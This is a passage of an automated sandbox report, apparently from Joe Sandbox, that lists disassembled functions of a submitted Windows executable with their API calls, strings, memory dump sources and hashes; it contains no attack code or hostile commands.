                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 887404ccc0af2737eb181804b0cd2f1f07666e2e1422051a45f8d63f6ad93291
                                                                                              • Instruction ID: 866ea69d970f6b3ebd73fec6533621782661a726766cd8f212924c0eb8f34c52
                                                                                              • Opcode Fuzzy Hash: 887404ccc0af2737eb181804b0cd2f1f07666e2e1422051a45f8d63f6ad93291
                                                                                              • Instruction Fuzzy Hash: 8FA002E6AB9203BD322866617E97E3B522CF8D0F36B308D3EF841D4085A8901D895131
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3F72E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F70C
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 0f9680cb29e22aabca88415703b0327ee7f5a3881d2592f92378cd4b9d5ceaa1
                                                                                              • Instruction ID: ff415bbfc1fbd413409c3cdbf6e74a30008c04be783be16d88fd5909f9c174b7
                                                                                              • Opcode Fuzzy Hash: 0f9680cb29e22aabca88415703b0327ee7f5a3881d2592f92378cd4b9d5ceaa1
                                                                                              • Instruction Fuzzy Hash: 09A002E6ABD203BD322866617E57E3B522CE8D4F62B308D3EF842C4085A8901D895131
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3F71A Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F70C
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 89273acc0e48bf160664b027b7db294478d74356fc77d03eb33fe542fbb3aecd
                                                                                              • Instruction ID: ff415bbfc1fbd413409c3cdbf6e74a30008c04be783be16d88fd5909f9c174b7
                                                                                              • Opcode Fuzzy Hash: 89273acc0e48bf160664b027b7db294478d74356fc77d03eb33fe542fbb3aecd
                                                                                              • Instruction Fuzzy Hash: 09A002E6ABD203BD322866617E57E3B522CE8D4F62B308D3EF842C4085A8901D895131
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A2B199 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetEndOfFile.KERNELBASE(?,00A2A083,?,?,-000018C0,?,-00002908,00000000,-00000880,?,00000000,?,?,00000000,00A2922F,-00008BE0), ref: 00A2B19C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: File
                                                                                              • String ID:
                                                                                              • API String ID: 749574446-0
                                                                                              • Opcode ID: aea9a20652ba4c10813a04c314e2cb9fb1f1053e24305d71f030f455d239eaba
                                                                                              • Instruction ID: 35abd080334d44ff49fe72dd23526faeec22693c5a709ea08878b547499bf01a
                                                                                              • Opcode Fuzzy Hash: aea9a20652ba4c10813a04c314e2cb9fb1f1053e24305d71f030f455d239eaba
                                                                                              • Instruction Fuzzy Hash: 7DA01230040009468D001730D90404D3720F7207C531001945006CA0A1C71644478600
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3BC19 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,00A3BFF6,00A71890,00000000,00A72892,00000006), ref: 00A3BC1D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentDirectory
                                                                                              • String ID:
                                                                                              • API String ID: 1611563598-0
                                                                                              • Opcode ID: 02adef0b9c2e422f3abb6df77d066df92a7dab7acebc69079e7a462940aeba4a
                                                                                              • Instruction ID: 3dcfba12cf79973c9d746892ab8dcfdcd7450e49385c5ff088f46279f84663f4
                                                                                              • Opcode Fuzzy Hash: 02adef0b9c2e422f3abb6df77d066df92a7dab7acebc69079e7a462940aeba4a
                                                                                              • Instruction Fuzzy Hash: 3FA0123110020087C2004B719F0550E76657F61601F00C024600080030D73088A0A500
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Non-executed Functions

                                                                                              Function 00A3D420 Relevance: 33.5, APIs: 17, Strings: 2, Instructions: 233windowfileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A212F6: GetDlgItem.USER32(00000000,00003021), ref: 00A2133A
                                                                                                • Part of subcall function 00A212F6: SetWindowTextW.USER32(00000000,00A545F4), ref: 00A21350
                                                                                              • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00A3D4B1
                                                                                              • EndDialog.USER32(?,00000006), ref: 00A3D4C4
                                                                                              • GetDlgItem.USER32(?,0000006C), ref: 00A3D4E0
                                                                                              • SetFocus.USER32(00000000), ref: 00A3D4E7
                                                                                              • SetDlgItemTextW.USER32(?,00000065,?), ref: 00A3D521
                                                                                              • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00A3D558
                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00A3D56E
                                                                                                • Part of subcall function 00A3BC2B: FileTimeToSystemTime.KERNEL32(?,?), ref: 00A3BC3F
                                                                                                • Part of subcall function 00A3BC2B: SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00A3BC50
                                                                                                • Part of subcall function 00A3BC2B: SystemTimeToFileTime.KERNEL32(?,?), ref: 00A3BC5E
                                                                                                • Part of subcall function 00A3BC2B: FileTimeToSystemTime.KERNEL32(?,?), ref: 00A3BC6C
                                                                                                • Part of subcall function 00A3BC2B: GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00A3BC87
                                                                                                • Part of subcall function 00A3BC2B: GetTimeFormatW.KERNEL32(00000400,?,?,00000000,?,00000032), ref: 00A3BCAE
                                                                                                • Part of subcall function 00A3BC2B: _swprintf.LIBCMT ref: 00A3BCD4
                                                                                              • _swprintf.LIBCMT ref: 00A3D5B7
                                                                                                • Part of subcall function 00A24A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A24A33
                                                                                              • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00A3D5CA
                                                                                              • FindClose.KERNEL32(00000000), ref: 00A3D5D1
                                                                                              • _swprintf.LIBCMT ref: 00A3D620
                                                                                              • SetDlgItemTextW.USER32(?,00000068,?), ref: 00A3D633
                                                                                              • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00A3D650
                                                                                              • _swprintf.LIBCMT ref: 00A3D683
                                                                                              • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00A3D696
                                                                                              • _swprintf.LIBCMT ref: 00A3D6E0
                                                                                              • SetDlgItemTextW.USER32(?,00000069,?), ref: 00A3D6F3
                                                                                                • Part of subcall function 00A3C093: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00A3C0B9
                                                                                                • Part of subcall function 00A3C093: GetNumberFormatW.KERNEL32(00000400,00000000,?,00A6072C,?,?), ref: 00A3C108
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: Item$Time$Text$_swprintf$FileSystem$FormatMessageSend$Find$CloseDateDialogFirstFocusInfoLocalLocaleNumberSpecificWindow__vswprintf_c_l
                                                                                              • String ID: %s %s$REPLACEFILEDLG
                                                                                              • API String ID: 3464475507-439456425
                                                                                              • Opcode ID: 7092ac17cde970d214bf5907a1cbeb8208b5a61c749ed7d6b40c6a66e89a20a5
                                                                                              • Instruction ID: e81b183b8d0e58c9350c32a43939dd7af819c9127b086dbf8189ce9554db22ff
                                                                                              • Opcode Fuzzy Hash: 7092ac17cde970d214bf5907a1cbeb8208b5a61c749ed7d6b40c6a66e89a20a5
                                                                                              • Instruction Fuzzy Hash: AE71B572548304BBE331EBB4ED49FFB77ACEB8A700F040829FA49D6091D775A9059762
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A27AAF Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 337fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00A27AB4
                                                                                              • _wcslen.LIBCMT ref: 00A27B1D
                                                                                              • _wcslen.LIBCMT ref: 00A27B8E
                                                                                                • Part of subcall function 00A28704: GetCurrentProcess.KERNEL32(00000020,?), ref: 00A28713
                                                                                                • Part of subcall function 00A28704: OpenProcessToken.ADVAPI32(00000000), ref: 00A2871A
                                                                                                • Part of subcall function 00A28704: GetLastError.KERNEL32 ref: 00A28759
                                                                                                • Part of subcall function 00A28704: CloseHandle.KERNEL32(?), ref: 00A28768
                                                                                                • Part of subcall function 00A2B470: DeleteFileW.KERNELBASE(?,00000000,?,00A2A438,?,?,?,?,00A2892B,?,?,?,00A5380F,000000FF), ref: 00A2B481
                                                                                                • Part of subcall function 00A2B470: DeleteFileW.KERNEL32(?,?,?,00000800,?,00A2A438,?,?,?,?,00A2892B,?,?,?,00A5380F,000000FF), ref: 00A2B4AF
                                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00A27C43
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00A27C5F
                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00A27DAB
                                                                                                • Part of subcall function 00A2B032: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00A27ED0,?,?,?,00000000), ref: 00A2B04C
                                                                                                • Part of subcall function 00A2B032: SetFileTime.KERNELBASE(?,?,?,?), ref: 00A2B100
                                                                                                • Part of subcall function 00A2A880: FindCloseChangeNotification.KERNELBASE(000000FF,?,?,00A2A83D,?,?,?,?,?,00A5380F,000000FF), ref: 00A2A89B
                                                                                                • Part of subcall function 00A2B8E6: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00A2B5B5,?,?,?,00A2B405,?,00000001,00000000,?,?), ref: 00A2B8FA
                                                                                                • Part of subcall function 00A2B8E6: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00A2B5B5,?,?,?,00A2B405,?,00000001,00000000,?,?), ref: 00A2B92B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Close$AttributesCreateDeleteHandleProcess_wcslen$BuffersChangeCurrentErrorFindFlushH_prologLastNotificationOpenTimeToken
                                                                                              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                              • API String ID: 1504485742-3508440684
                                                                                              • Opcode ID: 092b01afa55759068aa8535b387eafe7917b19e85c65ee94aef8960862258c2e
                                                                                              • Instruction ID: ab7c238432d2b662f2cfe29e943b1380dcd378f9304202abf06d33a7051d91f8
                                                                                              • Opcode Fuzzy Hash: 092b01afa55759068aa8535b387eafe7917b19e85c65ee94aef8960862258c2e
                                                                                              • Instruction Fuzzy Hash: 8AC1E471904264ABDB11DB68DD81FEEB3A8BF04314F104566F546E7282D734AA84CBB1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A4EAAE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: __floor_pentium4
                                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                              • API String ID: 4168288129-2761157908
                                                                                              • Opcode ID: 3f099e5a95b6fb0b7629881655aefe117ee974a172f31e5d738e5961c904df12
                                                                                              • Instruction ID: d29f125dee26c52425b36341057708aca647a70da5f45dffe2defdc9d814da96
                                                                                              • Opcode Fuzzy Hash: 3f099e5a95b6fb0b7629881655aefe117ee974a172f31e5d738e5961c904df12
                                                                                              • Instruction Fuzzy Hash: 3BC23775E086288FDB25CF28DD407EAB7B5EB88315F1551EAD80DE7240E779AE818F40
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A2395A Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 666COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog_swprintf
                                                                                              • String ID: CMT$h%u$hc%u
                                                                                              • API String ID: 146138363-3282847064
                                                                                              • Opcode ID: 9700fd7ae40e1176793e5ed2324bad2ccf46e48af2107a3f9fb36650ca61ad67
                                                                                              • Instruction ID: abf669a737494707281302f431c87170c4a45ce0a2ec8c1eb06c0fe6ca4212ab
                                                                                              • Opcode Fuzzy Hash: 9700fd7ae40e1176793e5ed2324bad2ccf46e48af2107a3f9fb36650ca61ad67
                                                                                              • Instruction Fuzzy Hash: 9642F9726053A49FDF24DF38D981BD93BA5AF15300F04457DFC4A8B282DB74AA89CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A22EB6 Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 804COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00A22EBF
                                                                                              • _strlen.LIBCMT ref: 00A2348B
                                                                                                • Part of subcall function 00A31600: __EH_prolog.LIBCMT ref: 00A31605
                                                                                                • Part of subcall function 00A32ED2: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00A2CF18,00000000,?,?), ref: 00A32EEE
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A235DD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                                                              • String ID: CMT
                                                                                              • API String ID: 1206968400-2756464174
                                                                                              • Opcode ID: 99e1da0325f9da59ff5304b05f3395f3d37b13834dd805b15b00a0716a943266
                                                                                              • Instruction ID: 2da37e1cee989535d918256c1a066316163dca81abca4fa70a9bd8d523811dcb
                                                                                              • Opcode Fuzzy Hash: 99e1da0325f9da59ff5304b05f3395f3d37b13834dd805b15b00a0716a943266
                                                                                              • Instruction Fuzzy Hash: 7C6238726042A48FDF29CF3CD9956E93BA1AF16304F08457EFC5A8F282DB749A45CB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A40A0A Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00A40A16
                                                                                              • IsDebuggerPresent.KERNEL32 ref: 00A40AE2
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00A40B02
                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 00A40B0C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                              • String ID:
                                                                                              • API String ID: 254469556-0
                                                                                              • Opcode ID: c76be082387f905a284a749ee197ee8e6c9380e9de10b35f34b9c4f6950cdf37
                                                                                              • Instruction ID: e4126d0b78b7857f25a80ba7cac70ae2e3019e3bb66b7b8d22dc22e7ae5bc168
                                                                                              • Opcode Fuzzy Hash: c76be082387f905a284a749ee197ee8e6c9380e9de10b35f34b9c4f6950cdf37
                                                                                              • Instruction Fuzzy Hash: 4F311A75D053189BDB10DFA4D989BCDBBB8BF08305F1042AAE50DA7250EB715AC59F44
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3F82F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • VirtualQuery.KERNEL32(80000000,00A3F774,0000001C,00A3F969,00000000,?,?,?,?,?,?,?,00A3F774,00000004,00A83D24,00A3F9F9), ref: 00A3F840
                                                                                              • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00A3F774,00000004,00A83D24,00A3F9F9), ref: 00A3F85B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoQuerySystemVirtual
                                                                                              • String ID: D
                                                                                              • API String ID: 401686933-2746444292
                                                                                              • Opcode ID: 3cfd1acee8bb802ddff8165b6d7ed23534717faccd6930895cc2d9db00e1c3b3
                                                                                              • Instruction ID: 14f6f8b81fb78bc91f59c03b59a0e2e4d78eb8f025e08089b5049c30a5307ae3
                                                                                              • Opcode Fuzzy Hash: 3cfd1acee8bb802ddff8165b6d7ed23534717faccd6930895cc2d9db00e1c3b3
                                                                                              • Instruction Fuzzy Hash: B501D432A101096BCB18DF69DC05AEE7BE9AFC4329F08C234AD19D7254E634D9428680
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A44FEF Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00A450E7
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00A450F1
                                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00A450FE
                                                                                              Memory Dump Source
